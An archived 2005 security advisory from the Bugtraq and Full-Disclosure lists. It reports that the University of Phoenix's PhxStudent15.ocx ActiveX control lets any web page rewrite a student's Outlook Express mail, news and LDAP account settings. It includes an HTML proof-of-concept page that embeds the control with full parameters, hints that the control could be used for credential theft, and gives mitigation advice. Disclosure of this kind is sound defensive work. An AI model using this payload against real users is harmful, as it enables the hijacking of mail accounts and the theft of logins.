lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <d64cfa0d05013121043f370b5d@mail.gmail.com>
Date: Mon, 31 Jan 2005 21:04:26 -0800
From: Adam Baldwin <evilpacket@...il.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: University of Phoenix - Outlook Express
	Unauthorized Configuration Manipulation


 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

University of Phoenix Outlook Express Unauthorized Configuration Manipulation
Vendor Homepage: http://www.phoenix.edu

Discovered by: Adam Baldwin (evilpacket@...nuity-is.com)
www.evilpacket.net\advisories\EP-000-0002.html

Discovery Date: 1.17.2005

File Name: PhxStudent15.ocx
Vulnerable Version: 2.00.0001

Overview:
PhxStudent15.ocx is an activex control used to setup e-mail / NNTP and
LDAP accounts in Outlook Express. This control remains on the users
system long after the setup process has completed. This activex
control can be used to manipulate the users account settings (imap /
smtp / nntp / ldap).

The following is an example of how to embed this control into a
website with the proper param's. Note the account is only 'modified'
if the "Program" param remains the same, which is not difficult. Any
of the other settings can be modified to cause any number of attacks
from denial of service to theft of login credentials, (be inventive
:-)

Example:
<HTML>
<BODY>
<OBJECT classid=CLSID:A82C3A33-5C0E-466C-B020-71585433A7E4
codeBase="PhxStudent15.ocx">
     <PARAM NAME="Program" VALUE="BSIT">
     <PARAM NAME="GroupID" VALUE="BSAF008HU0">
     <PARAM NAME="CourseID" VALUE="DBM/380">
     <PARAM NAME="StartDate" VALUE="01/20/2005">
     <PARAM NAME="Path" VALUE="">
     <PARAM NAME="DNS" VALUE="bsit2.phoenix.edu">
     <PARAM NAME="Student" VALUE="Y">
     <PARAM NAME="FName" VALUE="FIRSTNAME">
     <PARAM NAME="LName" VALUE="LASTNAME">
     <PARAM NAME="Alias" VALUE="username">
     <PARAM NAME="ErrorPath" VALUE="">
     <PARAM NAME="CourseListPage" VALUE="">
     <PARAM NAME="Account2000YN" VALUE="Y">
     <PARAM NAME="NNTPUserNamePrefix" VALUE="ols\">
     <PARAM NAME="EmailSuffix" VALUE="@email.uophx.edu">
     <PARAM NAME="LDAPServer" VALUE="ldap.uophx.edu">
     <PARAM NAME="MailoutLocation" VALUE="emailout.phoenix.edu">
     <PARAM NAME="EmailLocation" VALUE="email11.phoenix.edu">
     <PARAM NAME="FlexnetEmailLocation" VALUE="email11.phoenix.edu">
     <PARAM NAME="LDAPUserName" VALUE="">
     <PARAM NAME="ProgramSuffix" VALUE="_">
</OBJECT>
</BODY>
</HTML>

Mitigation:
The University of Phoenix has been contacted but no response has been
received. I would recommend that students remove this activex control
and only allow it to be installed while registering for classes.

Notes:
At this time further exploitation does not appear possible, although
on the following platform (with modification of the params) would
crash IE after the ocx was loaded and crashed 3 times in the same
browser window, which begs further research.

Platform: Windows XP SP2, IE 6.0.2900.2180.xpsp2_rtm.040803-2158 

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ